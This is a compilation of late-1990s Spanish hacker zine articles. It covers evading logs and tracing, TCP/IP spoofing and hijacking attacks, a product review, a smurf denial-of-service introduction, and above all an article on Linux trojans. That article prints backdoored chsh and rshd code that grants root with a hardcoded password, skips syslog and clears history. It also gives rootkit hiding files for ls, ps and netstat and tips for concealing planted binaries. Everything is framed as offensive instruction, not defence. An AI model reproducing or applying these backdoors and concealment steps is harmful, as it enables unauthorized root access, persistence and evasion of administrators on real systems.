  programas muy buenos para ello o tambien podemos leernos un fichero
  sobre este tema, de recomendable lectura:

        Secure Deletion of Data from Magnetic and Solid-State Memory
                                                      
                               Peter Gutmann
                       Department of Computer Science
                           University of Auckland
                         pgut001@cs.auckland.ac.nz

  El PGP version 5 y tambien la 6, disponen de una opcion para borrar un
  fichero de nuestro disco duro de forma segura o sea que no teneis excusa
  para no usarla!!!

    6-1-4. Eliminacion De Virus.

  Los virus son una de las peores pesadillas, pero en realidad no entiendo
  porque, ya que son solo programas. Y no son dificiles de controlar. Solo
  conviene tener un buen antivirus o varios, si, tambien los hay por internet
  a patadas y gratis.

  Incluso muchos virus se pueden anular mediante un par de comandos del
  MS-DOS, es simplemente conocer un poco los virus, logicamente se sale de
  la tematica de esta guia. Pero la realidad es que no hay que tener miedo
  de los virus. Si nuestro ordenador esta infectado, lo primero que tenemos
  que hacer es calmarnos, luego hacer una copia de seguridad de nuestro
  disco duro (da igual si esta infectado), por si el virus, en el peor de
  los casos borra el disco duro y ahora buscar una vacuna disponible.

  Si fuese el caso que nuestro antivirus no quita el virus, pues simplemente
  hacemos una copia y lo enviamos a alguna empresa de seguridad informatica
  ya que seguro que nos sacan un antivirus.

  Los virus para Windows cada dia estan aumentando, por lo que conviene estar
  atento de que AntiVirus los pueden eliminar. No me estoy refiriendo a virus
  Macros sino a autenticos virus, incluso algunos capazes de borrar
  informacion de nuestro disco duro.

  Estos virus disponen de tecnicas stealh, polimorficos, etc. o sea que
  tened cuidado y estar alerta y tener unas buenas copias de seguridad, por
  si acaso.

   6-2. Protegiendo Nuestras Acciones.

  Esta seccion esta enfocada a esconder nuestros actos hacking por Internet.
  Ya que todo lo que hagamos dejaremos huellas y por desgracia la gente no
  se entera de esto y deja muchas pistas.

    6-2-1. Borrando Nuestras Huellas.

  Cuando conectamos a un servidor, este graba lo que hacemos (cuando hemos
  conectado, como, desde donde y varias cosas mas), por eso hay que tener
  mucho cuidado.

  La mayoria de servidores que hackeemos por Internet seran unix, conviene
  tener a mano "zappers", son programas que borran nuestras huellas en el
  servidor. Existen muchos programas para este proposito que funcionan bajo
  Unix. Solo los tenemos que compilar en el servidor y ejecutarlos. Por
  desgracia al usar Win95/98 no podemos compilarlos en nuestro ordenador y
  subirlo por FTP pero algo es algo.

  Tambien tenemos que procurar esconder nuestra IP, hay muchos metodos
  para ello, la mas facil es usar nodos (servidores intermedios y asi
  dificultar nuestro rastreo). Un esquema simple seria el siguiente:

    Hacker ------- Servidor ------ Servidor ------- Victima.
      |               |               |                |
    Nosotros    Primer servidor   Segundo servidor  Servidor victima
                para despistar    para despistar

  Hoy en dia, podemos usar muy diferentes opciones para escondernos como por
  ejemplo, servidor que hayamos hackeado, sistemas con wingates o similares e
  incluso ordenadores que tenga el BO (Back Oriffice) instalado.

    6-2-2. Encriptando Nuestro Correo.

  Conviene encriptar nuestro correo, sobre todo si esta relacionado con el
  hacking, ya que asi nadie podra saber que pone y acusarnos de nada. Siempre
  podemos alegar "Privacidad en los Datos" :). Al igual que antes hay varios
  paquetes de PGP para mail.

  Incluso es recomendable el uso de cuentas anomimas de correo, aunque de
  esto la gente esta mas concenciada.

  Volvemos a hacer uso de nuestro querido programa PGP version 5 o 6, a gusto
  del consumidor.

  7. Sugerencias Para Un Mejor Hacking.

  Aqui hablare sobre algunas ideas que pueden potenciar el hacking en
  Win95/98 y la creacion de nuevas herramientas. 

   - Programas troyanos que capturen el password del acceso a Internet.

   - Programas para IP-Spoof.

   - Creacion de herramientas de redes para Win95/98.

   - Wardialers.

   - Programas para atacar otros Win95/98 (DoS).

   - Nuevas Suites.

   - Programas crackeadores del passwd.

   - Programas criptograficos.

   - Programas eliminadores de ficheros de forma segura.

   - Puertas traseras.

   - Programas de administracion remota.

   - Programas DoS para saltarse protecciones.

   - Programas que realmente proporcionen seguridad a nuestro sistema.

  8. Obtener Informacion.

  Todo el mundo esta harto de ver cientos de web's donde no hay nada o
  todo esta repetido. Pues ahora os pondre unas pautas que seguir para
  obtener la mayor fuente posible de informacion.

    - Web's sobre hack (que decir).

    - Web's sobre seguridad Informatica (aqui siempre podemos encontrar
      muchas cosas, que nos podran servir).

    - Los RFC (Informacion tecnica sobre Internet, protocolos, seguridad,
      etc...).

    - Libros de colores (Documentacion tecnica sobre seguridad en muchos
      aspectos).

    - News (estar en un grupo de news y asi recibir noticias de lo que pasa).

    - Mailing lists (aqui estaremos permanentemente informados).

    - IRC (podremos hablar con otros hackers y cambiar opiniones).

  9. Despedida.

  Pues aqui se acaba esta guia sobre hacking en Win95/98. Espero que os halla
  gustado y os sea util, por todo el esfuerzo que ha llevado esta guia.

  Por desgracia me he dejado muchas cosas en el tintero, que me hubiese
  gustado explicar pero quien sabe a lo mejor aperece una nueva entrega
  nunca se sabe :)

  Me gustaria descatar que a lo mejor con los ultimos puntos de la guia, te
  has quedado sorprendido respecto a su titulo y despues al ver su contenido,
  esto se debe a que he preferido dar pautas a seguir y no empezar a explicar
  cosas que ya muchos sabran o que es informacion realmente facil de
  encontrar por Internet, ademas si empiezo a explicar algunos de esos
  titulos me saldria del proposito de esta guia, que es el hacking en Win95/98
  y NO de otros sistemas operativos los cuales disponen de miles de guias
  sobre hacking.

  Bueno ya solo me queda despedirme y tened cuidado con lo que haces por
  Internet, ya que un hacker no se dedica a destruir sistemas informaticos.
  Y agradecer a todos los que hallan escrito sus conocimientos sobre hack
  en win95/98 para la creacion de esta guia pero por supuesto que todavia
  quedan muchas cosas mas, esto es simplemente una solida base para
  comezar en tu "alter ego" como hacker!!!.

   9-1. Agradecimientos.

  Y desde aqui saludar a todos aquellos que de alguna forma han
  participado en la creacion de esta guia, que son muchas asi como a todas
  las personas que me conocen :) Que no las listo aqui debido a que son
  muchisimas!!!!!

                                                            Nobody (c) 1998.

<>

<>

        CyberAngel: Un programa, un password, un monton de seguridad
        ------------------------------------------------------------

                          By Mac Crack & Tasslehoff
                          - J.J.F. / Hackers Team -

  1.- Que es CyberAngel EXR?
  2.- Como funciona?
      2.1.- Configuration Manager
      2.2.- Encriptacion
      2.3.- Passwords incorrectas
      2.4.- Alerta automatica
      2.5.- Soporte tecnico
  3.- Conclusion

  1.- Que es CyberAngel EXR? 

        CyberAngel EXR es un nuevo producto de la casa "Computer Sentry
  Software Inc." (http://www.sentryinc.com) enfocado a la seguridad de
  empresa. Es un programa que protege tus datos incluso si te han robado el
  ordenador. Lo bueno de este programa es que es muy facil de usar, tiene un
  precio razonable (unas 7000 pelas) una facil configuracion de seguridad y
  key recovery, lo unico malo es que, de momento, es un programa que solo
  funcina si se tiene un acceso via modem. Es un programa principalmente
  enfocado para portatiles y ordenadores de empresas.

  2.- Como funciona?

        El funcionamiento del programa es relativamente simple, como su
  configuracion. Se instala el programa, pero seguros de que el ordenador
  esta conectado a la red, despues de copiarse los archivos, vas a una
  especie de registracion on-line, en la cual tienes unas opciones de
  configuracion, en el cual un password es requeridos para poder registrarlo,
  o sea, que el programa debe ser original, despues seleccionas el tipo de
  notificacion que quieres que te hagan cuando alguien ha conseguido entrar
  en tu ordenador. Tu password se necesita tambien para el soporte tecnico :o)
        Bien, ahora, cada vez que enciendes o apagas tu ordenador, o bien, lo
  reseteas tendras que poner tu passwd de CyberAngel, solo que la diferencia
  con los passwds tradicionales es que en este caso no te sale una pantallita
  pidiendote el passwd, por eso, la persona que entre/robe tu ordenador no
  sera consciente de que hay una proteccion puesta.

  2.1.- Configuration Manager

        Es un interface muy sencillo y muy facil de usar para cambiar las
  preferencias del programa, requiere el disco original, tu passwd y el
  numero de serie. Esta aplicacion actualiza automaticamente la encriptacion
  de todas las "keys" (llaves) de tu ordenador.

  2.2.- Encriptacion

        La ventana de encriptacion te muestra los todos los archivos que hay
  en tu ordenador y asi puedes seleccionar los archivos que quieres encryptar
  y tambien puedes seleccionar el tipo de algoritmo de encriptacion que
  desees. Pero, por ejemplo, si copias o cambias archivos de carpetas, el
  programa los desencripta automaticamente y vuelve a encriptar siempre y
  cuando se haya metido el passwd correcto.
          El sistema de encriptacion trabaja a unos 500KB de memoria, para
  hacer el trabajo de encriptacion/desencriptacion mas o menos rapido sin
  consumir muchos redcursos del ordenador. Cada fichero o carpeta de ficheros
  puede tener algoritmos de encritpacion distintos segun los hayas elegido.
          Por ejemplo puedes elegir desde 448-bit Blowfish, 56-bit DES, o
  128-bit EXR. El tipo de encriptacion de 448 bit es generado aleatoriamente
  durante la instalacion del programa.
        CyberAngel, como muchos programas de encriptacion, no encripta
  ficheros .COM o .EXE, mas que nada por las protecciones contra reseteos,
  falta de corriente, etc. Durante la encriptacion, se genera un directorio
  de backup, el cual se borra automaticamente cuando se ha terminado la
  encriptacion y ha sido verificada correctamente por el programa. Cuando
  reseteas el ordenador y le pones de nuevo el passwd, los ficheros se
  desencriptan automaticamente y se tiene acceso a ellos, si no es correcto
  no tienes acceso.

  2.3.- Passwords incorrectas

        Que pasa si alguien mete un passwd incorrecto?, bien, la respuesta es
  sencilla, CyberAngel EXR bloquea el ordenador, es decir, te cierra todos los
  puertos de comunicaciones, impidiendo que, si esta conectado a Internet,
  puedas entrar en cuentas, por ejemplo (nota: este programa tb puede ser
  usado para los nios, es decir una escpecie de CyberPatrol o NetNanny, o sea
  de estos programas para que los nios no entren en sitios guarros :o))
          Tambien se puede usar la opcion PLUS, que lo que hace es bloquear el
  teclado y el raton, restringiendo el acceso a ficheros, para copiarlos,
  bajarlos o bien imprimirlos.

  2.4.- Alerta automatica

        CyberAngel EXR tiene un sistema de alerta automatica llamada "7x24
  CSS Security Monitoring" el cual te avisa via fax o e-mail si tu ordenador
  esta siendo utilizado sin autorizacion. El escaneo de tu ordenador lo hace
  ya este conectado desde un modem o via TCP/IP. Este escaneo lo hace el
  propio ordenador y esta intentando conectar al sistema de alerta hasta que
  consiga la linea para ello. Si el ordenador ha sido conectado a una linea
  de telefono, una red, LAN o WAN, manda una alerta encriptada, incluso quita
  el sonido al marcar para que el intruso no se de cuenta de lo que el
  ordenaodr esta haciendo.

  2.5.- Soporte tecnico

        Tambien puedes llamar inmediatamente al servicio tecnico, el cual
  calificara tu ordenador de robado y generara un informe sobre tu ordenador,
  el cual incluye el IP desde donde el ordenador realizo la alerta, el numero
  de telefono, nombre, apellidos y direccion asociados de es numero de
  telefono. Despues de esto ya es otro asunto, se le manda el informe a la
  policia.

  3.- Conclusion

        CyberAngel EXR es uno de los mejores programas del mercado para
  proteger datos. Es realmente facil de instalar y de usar. Diseado para
  W95/98/NT. Tambien se puede hacer una instalacion en una red.
          Administradores de sistema encontraran este programa bastante util,
  ya que los usuarios podran seguir usando sus mismos passwords, asi que no se
  necesita reconfigurar para cada usuario. La encriptacion es "transparente",
  o sea que no sabes que esta haciendo el ordenador si eres un intruso.
  Cualquier password que se haya olvidado, se pueden volver a pedir al
  Monitoring Center. Es decir una buena herramienta para proteger tu
  ordenador.

  Preguntas, comentarios, etc...
  mac@jjf.org
  tasslehoff@jjf.org

<>

<>

                              - CURSO DE HACK -
                                 CHAPTER VII

        Bueno, pues aqui esta la septima entrega de vuestro curso favorito,
  aunque me gustaria saber si os esta sirviendo de algo o solo estoy
  escribiendo lineas inutilmente. Me alegraria mucho que enviarais mail
  contando vuestros progresos.

        Quiero dejar claro, que este curso no sigue un orden lineal, yo
  simplemente voy explicando temas y despues lo entrezalo, pero conviene que
  los lectores estudien por su cuenta, puede que algunos capitulos pueden
  ser muy faciles y otros de gran complejidad, como es el caso de hoy ;-)
  Este capitulo esta enfocado a distintos ataques en el protocolo TCP/IP. 
  No veo la necesidad de explicar el manejo de Linux al igual que el
  funcionamiento de los protocolos, por lo que asumire un cierto
  conocimiento por parte del lector en estas interesantes y desconocidas
  materias.

        Si al comenzar tu lectura no entiendes nada de lo aqui explicado y
  como soy un buen chico :) os pongo unas cuantas url's donde podreis
  aprender de como funciona tecnicamente el protocolo TCP/IP.

  http://studys.mcs.mu.edu/~chong/mscs210/protocol.html/#ftp
  http://www.cis.ohio-state.edu/htbin/rfc/arpa-internet-protocols.html
  http://sunsite.auc.dk/RFC/rfc/rfc1180.html
  http://ipprimer.2ndlevel.net/

        Pues ya sabes, a leer se ha dicho! Y ahora empezemos este curso.
  Para este capitulo el Linux nos sera realmente util, ya que tendremos que
  retocar las cabezeras de los paquetes que enviemos a los servidores, asi
  como distintas herramientas. Debido al peligro que puede llevar la
  informacion de este articulo, solo lo explicare teoricamente y no
  expresamente como realizarlos, pero con algo de imaginacion lo podras
  conseguir :)

  # Ataque de prediccion de numeros.

        Este ataque siempre debe ser realizado antes de cualquier otra
  variante de ataques en el protocolo. Este ataque lo realizamos con el fin
  de acceder a la red que nos interesa. Este ataque contiene 2 pasos, el
  primero seria averiguar el IP del servidor que nos interesa, esto es
  realmente facil y lo podemos hacer de muchas maneras, hacemos esto porque
  otros ordenadores de esa red comparten valores con el servidor, entonces
  imitamos una IP de la red para saltarnos el router y conseguir acceso.
  Por ejemplo:

     X --------------------------> 195.0.0.10 (servidor)
    Hacker                |
                          |  195.0.0.1
                             195.0.0.2
                             ...
                             195.0.0.255

           Aqui vemos con el hacker conoce la IP del servidor la cual es
  195.0.0.10 por lo puede conocer otros sistemas de la red, en este caso
  de clase C. Ahora que ya conoce la red, el hacker comienza a monotizar
  el numero de secuencia de los paquetes que pasan por la red. Despues de
  un rato que ya sabemos como funciona, el hacker debe intentar predecir el
  numero de secuencia del servidor y "spofear" la secuencia, para meterse
  entre el servidor y el usuario de la red. Como el hacker conoce la IP
  del server puede generar numeros de secuencia para pasarselos al servidor y
  asi engaarle. Normalmente este ataque se suele usar como base para
  atacar un servidor o un sistema de la red. Un ejemplo del engao:

     X ------------------------> 195.0.0.10 (servidor)          195.0.0.15
    Hacker           |                                            Usuario
                      Simulamos que
                      somos el IP
                      195.0.0.15


   # Ataque de robo de la conexion (IP Hijacking).

        Este ataque posiblemente es el mas peligroso que se puede cometer
  contra un servidor (tambien es conocido como "sniffing" activo). Este
  ataque que realizamos en el protocolo TCP, fuerza al servidor a aceptar
  nuestra conexion como si fueramos un IP de confianza (trust). Basicamente
  el ataque consiste en que conseguimos acceso en uno de los sistemas de la
  red del servidor que queremos entrar, entonces desconectamos el sistema de
  la red y hacemos creer al servidor que somos realmente la IP de confianza.
  Por ejemplo:

     X -------------------> 195.0.0.10 ----            ------ 195.0.0.15
    Hacker       |          (servidor)          |               Usuario
                 |                              |
              Simulamos ser                   Hemos cortado 
              el IP 195.0.0.15            la conexion autentica.

        Este ataque es potencialmente mas peligroso que el "IP Spoofing",
  debido a que si sale exitoso, se consegui mucho mas acceso al servidor e
  incluso podemos evadir los mecanismos de seguridad.

  # Ataque sniffer.

        Este tipo de ataque el realmente comun en Internet, tambien es
  conocido como ataque pasivo. Normalmente este puede ser el primer paso
  que un hacker realiza, debido a que puede conseguir informacion para
  despues realizar otro tipo de ataque potencialmente mas peligroso. Este
  ataque seguramente es el mas facil de realizar, simplemente necesitamos
  el Login y el Password de un usuario de la red, entonces entramos en la
  cuenta y colocamos un sniffer para reunir informacion de la red.
  Por ejemplo:

           |-> Servidor --|
           |              |
       Sistema   RED    Sistema
           |              |--------------> X (hacker)  Copiamos los
           |-- Sistema  <-|<---------------|           paquetes TCP que
                             Paquetes TCP              vamos monotorizando.

        Como vemos el hacker copia todos los paquetes que pasan por la red,
  con el fin de sacar informacion para un ataque de mayor envergadura, como
  por ejemplo "IP Spoofing" o "IP Hijacking".

  # Ataque de desincronizacion activa.

        Este ataque se basa, en que el hacker fuerza a los dos sistemas de
  la comunicacion TCP a un estado de desincronizacion para que no puedan
  cambiar informacion entre si, entonces el hacker utiliza un tercer sistema
  (ordenador) que este entre la conexion TCP creando paquetes para
  remplazarlos y pasarlos a cada extremo de la conexion TCP, con lo que
  el hacker obtiene todos los paquetes de la conexion original.

  # Ataque de robo de previa-desincronizacion.

        Este ataque es una variante del Hijacking y se basa en el que el
  hacker es capaz de escuchar todos los paquetes entre los 2 sistemas que
  se estan comunicando, ademas el hacker es capaz de cambiar los paquetes
  originales por unos falsos para esconder del cliente y del servidor. Esta
  conbinacion permirte al hacker forzar la comunicacion entre el cliente
  y el servidor.

        Supongamos que el hacker ha conseguido desencronizar la comunicacion,
  entonces el cliente envia un paquete con la siguiente cabezera:

  SEG_SEQ = CLT_SEQ
  SEG_ACK = CLT_ACK

        Como el hacker ha desencronizado la comunicion el paquete del cliente
  no sera aceptado por el servidor debido a que la informacion es incorecta.
  Entonces el hacker copia el paquete rechazado por el servidor. Pasado un
  ratito el hacker envia el mismo paquete rechazado pero cambiando la
  cabezera:

  SEQ_SEQ = SVR_ACK
  SEG_ACK = SVR_SEQ

         Esta vez la cabezera es correcta por lo que el paquete si sera
  aceptado por el servidor. Este ataque no acaba aqui realmente pero lo dejo
  en este punto, para que os pique la curiosidad y busqueis informacion.
  Deciros que este ataque nos puede servir para saltarnos la seguridad de
  un servidor Web con SSL incluido ;-)

        Existen muchos ataque todavia en el TCP/IP que aqui no explico, quien
  sabe si en algun futuro numero lo hago :) Por ejemplo ACK Storm, ataques
  de Telnet, y unos nuevos ataques que se descubrieron a principios de ao
  (1998), conocidos como Insercion y Evasion que permiten saltarte muchos
  IDS (Sistema de deteccion de Intrusos).

        Lo mejor para aprender sobre este tipo de cosa es siempre tener a
   mano los famosos RFC y Linux o FreeBSD, herramientas que nos permitan
   cambiar los paquetes, asi como interceptarlos, etc...

  Byes all y hasta la vista !!
   
                                                        CONDE VAMPIRO
                                                  - J.J.F. / HACKERS TEAM -

<>

<>

             ****************************************************
             **               Troyanos en Linux                **
             ****************************************************  

        Holas. He decidido escribir este articulo para ayudar a la gente que
  esta empezando en esto del hack, bueno.. empezando empezando no, tiene que
  tener un nivel minimo; saber manejarse algo en entornos unix, algo de
  programacion en C (tarde o temprano tendras que aprender), y cosas de ese
  estilo, pero mas o menos creo que cualquiera que tenga unos minimos
  conocimientos le sacara provecho. Tampoco va a ser un supertexto, mas bien
  sera un texto practico que servira para aclarar ideas de que es un troyano,
  como instalarlo, etc., y por si alguien lo esta pensando no se trata de
  troyanos tipo "Bo" y similares, sino que seran troyanos aplicables solo al
  entorno linux.

  .- Que es un troyano?

        Pues es, mas o menos, un programa modificado a tu gusto que lo pones
  sobreescribiendo al original, de forma que las modificaciones que hayas
  hecho te sirvan para algo claro, por ejemplo que te den root facilmente y
  sin huellas, para ocultar cosas al administrador (directorios, conexiones),
  etc.

  .- Tipos basicos de troyanos.

        Yo mas o menos los he dividido en 3 tipos; troyanos para conseguir
  root local, troyanos para conseguir root remoto y troyanos para ocultar
  cosas de todo tipo como pueden ser directorios, procesos, conexiones, etc.

  *- Troyanos para conseguir root local:
  --------------------------------------

        Estos troyanos normalmente siempre se colocan nada mas haber obtenido
  root en la makina. Esto se hace asi porque normalmente se instalan en un
  segundo, ya que son muy simples, y te evita comerte el coco para conseguir
  root otra vez si es que al administrador le da por parchear el bug por el
  que has conseguido privilegios, aunque esto deberias hacerlo tu por etica y
  tal..., aparte que asi te evitas que vengan otros y se te apoderen
  facilmente de "tu" sistema jeje.

        Troyanos de este tipo por ejemplo son el chsh, que es un programa que
  sirve para cambiarte la shell, por ejemplo de bash a zsh. Al ejecutarlo te
  pide una nueva shell, por lo que es muy facil modificarlo para que dandole
  una shell determinada te habra una shell con uid 0. Por cierto que los
  troyanos que salgan en este articulo los podeis conseguir en
  http://welcome.to/neptuno

        Como no voy a poner todo el codigo fuente aqui, pongo las lineas que
  estan modificadas y las explico un poco. Las fuentes de linux es muy
  recomendable tenerlas a mano y las podeis conseguir o de los cds de debian
  (p.ejemplo), o de ftp.rediris.es (login:ftp), en el directorio
  /linux/debian/source.

        Los troyanos muchas veces se hacen con simples ifs (condicionales) y
  poco mas. En este caso lo que hace es declarar un entero con int elite=0; y
  un password con char clave[6]=peper; al principio del fichero (sino sabeis C
  lo tendreis un poco chungillo pa entender esto pero bueno). Peper sera lo
  que tengais que poner cuando os pida la nueva shell al ejecutar el programa.

  Ahora pego la chicha del codigo.

  if (!strcmp(shell,clave)) elite++; /* --> Aqui compara la shell con nuestro
                                            password (peper) y si son iguales
                                            pone elite a 1 */
					
  if (!elite) { /* --> Todo esto se la salta si elite esta a 1, o sea si
                       metimos el password correcto */

    if (check_shell (shell) < 0) return (-1);

    if (! strcmp (pw->pw_shell, shell)) {
        printf ("Shell not changed.\n");
        return 0;
    }
    if (!strcmp(shell, "/bin/sh")) shell = "";
    pw->pw_shell = shell;
    if (setpwnam (pw) < 0) {
        perror ("setpwnam");
        printf( "Shell *NOT* changed.  Try again later.\n" );
        return (-1);
    }
    printf ("Shell changed.\n");
    return 0; }
    if (elite) { /* Aqui si elite esta a 1 pone nuestro uid y gid a 0, o sea
		    el del root, setea HISTFILE para evitar el .bash_history
		    y ejecuta una shell */

        setreuid(0,0);
        setregid(0,0);
        setenv("HISTFILE","",1);
        system("/bin/bash");
        }
  }

        Y eso es todo, ya tenemos un troyano que al ejecutarlo y darle de
  shell peper nos abrira una shell de root. Por cierto, que este troyano para
  funcionar tiene que tener suid de root, pero como el chsh original tambien
  lo tiene es dificil que el administrador se de cuenta del cambio. Recordad
  que la fuente entera la podeis bajar de http://welcome.to/neptuno . Chsh
  normalmente esta en /usr/bin.

  *- Troyanos para conseguir root remoto:
  ---------------------------------------

        Este otro tipo de troyanos se utiliza para mantener el acceso a la
  makina hackeada. De esta forma es muy facil entrar como root desde fuera,
  evitando todos los logs que deja hacer un simple telnet a una cuenta.

        El tipico troyano de este tipo es el del programa login, normalmente
  situado en /bin. Lo que pasa que este programa es bastante complejo (sobre
  todo si el password esta shadow), por lo que no me iba a tirar yo aqui horas
  explicando y pegando mogollon de codigo fuente (en mi page pondre en breve
  uno hecho por mi por si a alguien le interesa), asi que pondre uno mas
  sencillo como puede ser el del rshd.

        El rshd es un servicio parecido al rlogin, pero que en vez de abrirte
  una shell permite ejecutar comandos remotos, lo que no quita que tu puedas
  ejecutar el comando /bin/bash por ejemplo abriendote una cuenta. Pues bien,
  el objetivo es que haciendo un rsh a la makina con un login determinado el
  programa ejecute el comando que tu le digas con uid 0, incluido el /bin/bash
  y practicamente sin logs. Para que funcione tendras que sobreescribir el
  original, normalmente en /usr/sbin/in.rshd, y que el servicio este activado
  en el /etc/inetd.conf claro. Pasemos a la explicacion..

        Lo primero que hace es declarar un entero con int elite=0;, o sea,
  igual que antes con el chsh. Luego declara el password que se va a usar para
  entrar como root con char clave[6]=peper;, por cierto que si cambias peper
  por otra clave acuerdate de modificar el 6 por el numero de letras que
  tenga +1. Luego hay esto..

        getstr(locuser, sizeof(locuser), "locuser");
        getstr(cmdbuf, sizeof(cmdbuf), "command");
        if (!strcmp(locuser,clave)) { elite++; strcpy(locuser,"root"); }

        En esta ultima linea esta todo el troyano; compara el login (o sea el
  usuario) con el nuestro, y si coinciden pone elite a 1 y copia el string
  root al login. Como veis casi todos los troyanos hacen cosas muy parecidas.
  Despues ya ahi cosas tipicas, como:

        if ((paranoid || pwd->pw_uid == 0)&&(!elite)) {
                    syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: cmd='%s'",
                        remuser, hostname, locuser, cmdbuf);

        que lo que hace es evitar el syslog si entramos con nuestra clave,
  etc. Para usar el troyano, despues de haber sobreescrito el
  /usr/sbin/in.rshd, hay que hacer un rsh -l nuestraclave(peper_en_este_caso)
  makina.com /bin/bash. Despues hay que borrar nuestra entrada del
  /var/log/secure, ya que ese log el troyano no lo evita, en cambio si setea
  el HISTFILE, o sea el .bash_history.

        Bueno, y con eso ya tenemos garantizado el acceso remoto como root, y
  por si falla ya tenemos un troyano local para entrar con una cuenta de un
  usuario y conseguir root facilmente. Ahora lo que viene ya son troyanos
  para sacar provecho de esa makina; poner algun bot, bouncers, ocultar
  sniffers, etc. Por cierto, y ya no lo repito mas, que los troyanos los
  podeis encontrar en http://welcome.to/neptuno (bueno, y en miles de sitios
  de internet claro).

  *- Troyanos para ocultar directorios, procesos..etc.
  ----------------------------------------------------

        Ahora llegan los troyanos para ocultar ficheros, procesos, conexiones,
  o sea, para ocultar todo lo ocultable jeje (tranquilos que ya keda poco de
  texto ;).

        Para empezar esta el troyano de ls, que normalmente estara en /bin/ls
  (Ahora ya pasare de poner los codigos porque sino me enrollo mucho y mas o
  menos son todos iguales). Como decia este troyano sirve para ocultar
  ficheros y directorios, y para funcionar necesita tener la referencia en un
  archivo de donde vaya sacando los nombres de ficheros y directorios a
  ocultar. Puedes poner los nombres dentro del codigo y te ahorras el archivo
  ese, pero no creo que sea plan andar compilando todo el dia cada vez que
  quieras ocultar un nuevo fichero (y aparte que tendrias que subirlo de nuevo
  a la makina cada vez). Normalmente en el codigo hay una linea que pone algo
  asi como #define PATH "/dev/ptyr", que es el archivo de donde cogera los
  datos, que por cierto yo que tu lo cambiaba ahora mismo, mas que nada
  porque ya estan muy vistos. Bueno, pues despues de haber sobreescrito el
  /bin/ls con el troyano, si por ejemplo quieres ocultar un directorio con
  nombre pepito pues en /dev/ptyr aades una linea con la palabra pepito, y
  lo mismo con los archivos. Por cierto, supongo que no hace falta que diga
  que al /dev/ptyr le aadas una linea con la palabra ptyr ;)
        (Nota: si el admin ve el directorio desde algun tipo de visor grafico
  desde las X el troyano no hara nada y vera los ficheros y directorios
  ocultos).

        Despues esta el troyano de ps y top, que son para ocultar procesos, el
  archivo de informacion es normalmente el /dev/ptyp, y se utiliza de la
  siguiente forma.

  Ej. de /dev/ptyp:

               0 0             Oculta todos los procesos corriendo bajo uid 0
               1 p0            Oculta todos los procesos bajo tty p0 
               2 sniff         Oculta todos los procesos cuyo nombre sea sniff
               3 hack          Oculta todos los procesos en cuya linea de
                               ejecucion aparezca la palabra hack.
                               (ej. hack makina.com -0)

        Hay que sobreescribir los originales normamente en /bin/ps y
  /usr/bin/top, el fichero ptyp es el mismo para los dos. Si consigues este
  troyano, al igual que el de ls en algun rootkit y no te compila bajatelos
  de la web que llevo repitiendo todo el articulo, ya que estan optimizados
  para libc6 (supongo que en tambien libc5 compilaran).

        Bueno, y por ultimo keda el del netstat, que sirve para ocultar
  conexiones, puertos abiertos, etc etc. Ya se que hay 2.235.678,93 de
  troyanos mas pero sino este articulo me ocuparia paginas y paginas, a parte
  de que estos son los mas basicos. Y sino os bajais algun rootkit que traen
  muchisimos, lo que pasa que tambien muchisimos no compilaran porque faltan
  librerias, archivos de cabezera.. etc :(

        Bueno, lo que iba diciendo, el del netstat. Normalmente el archivo de
  informacion de este es /dev/ptyq, y esta organizado de la siguiente forma,
  que ilustrare con un ejemplo :)

               0 500           <- Oculta las conexion hechas por el uid 500
               1 128.31        <- Oculta las conexiones desde 128.32.xx.xx
               2 128.31.39.20  <- Oculta las conexiones a 128.31.39.20
               3 8000          <- Oculta todas las conexiones al puerto local
                                  8000
               4 6667          <- Oculta todas las conexiones al puerto remoto
                                  6667
               5 .term/socket  <- Oculta este socket

        El fichero modificado hay que copiarlo sobreescribiendo el
  /bin/netstat, y hay que poner siempre ips, si pones hosts no funcionara.

  *- Consejos finales
  -------------------

  Pues ahi van unos consejos que a mi al menos me son de utilidad:

        1.- Cuando metas un troyano fijate bien en los permisos para que tenga
  los del programa origal, y que el dueo y el grupo sea el mismo.

        2.- Para que no llame mucho la atencion la fecha haz un touch -r
  fichero_de_referencia troyano, asi el troyano quedara con la fecha del
  fichero de referencia.

        3.- Con chattr +i troyano el fichero no se podra borrar, ni siquiera
  el root podra a no ser que ponga chattr -i troyano.

        4.- Si la makina no tiene activado el ftp y no sabes como subir los
  troyanos, haz un ftp a tu ordenador desde alli y bajatelos.

  *- Despedida
  ------------

        Bueno, esto ya se ha acabado. Recordad bajaros los troyanos completos
  de http://welcome.to/neptuno, ya que aqui no los he podido incluir por
  razones de espacio.

        Un saludo a mi novia, y a toda la pea del canal #hacker_novatos,
  especialmente a ulan, sp4rk, kr0n0, MaNiaK, Case, Freedom (fundandor de la
  pagina del canal) y a alguno mas que se me olvida. Ah!, y no olvideis
  pasaros por el canal de vez en cuando ;) Byes.

  PoSiDoN
  posidon@poboxes.com

<>

<>

                  Todo (o casi todo) sobre el SMURFING v1.0
                  -----------------------------------------

                                Mac Crack
                          - J.J.F / Hackers Team -

  1.- Que es el SMURFING?
  2.- Como actua?
  3.- Forma de arreglarlo/detectarlo
      3.1.- Usando smurflog.tgz
      3.2.- Filtrando informacion
  4.- Herramientas
      smurf.c
      fraggle.c
      broadscan.c
      papasmurf.c
      papasmurf-linux.c
  5.- Creditos

  1.- Que es el SMURFING?
  -----------------------

        El smurfing es un tipo de ataque a traves de ICMP que basicamente lo
  que hace es flodear una red de ordenadores, simulando una IP falsa. Es un
  ataque bastante simple en si, pero muy desagradable tambien, te colapsa la
  red.

  2.- Como actua?
  ---------------

        Lo que hace basicamente es mandar un monton de paquetes por ICMP como
  dije antes. La manera de hacerlo es spoofeando las IP's de la red a atacar.
  El smurf lanza un ataque de, pongamos por ejemplo 25 Kbps de ICMP a una red
  de 100 ordenadores. Bien, digamos que la "ventaja" de este ataque es que te
  pueden mandar una burrada de paquetes a la vez, ya que son muy pequeos.
  El ordenador a los que le mandamos estos paquetes, analiza de donde vienen,
  pero al tener una IP simulada de la red a donde mandamos este ataque, el
  ordenador piensa que se lo esta mandando un ordenador de su misma red, por
  lo cual, le devuelve el ataque, PERO, se lo devuelve a otro ordenador
  distinto de la misma red, es decir, se estan atacando unos a otros dentro de
  su misma red sin saberlo. Este ataque es una manera de DoS (denial of
  service). Al poco rato la red se cae por inundacion (flood) de paquetes de
  informacion. Basicamente este ataque se usa mucho en los servers de IRC.

        Vamos a analizar este ataque un poco mas. Otra de las "ventajas" que
  tiene este ataque es que funciona desde cualquier sitio, es decir, no
  importa el tipo de conexion que tengas, te funciona desde un modem a 14.4
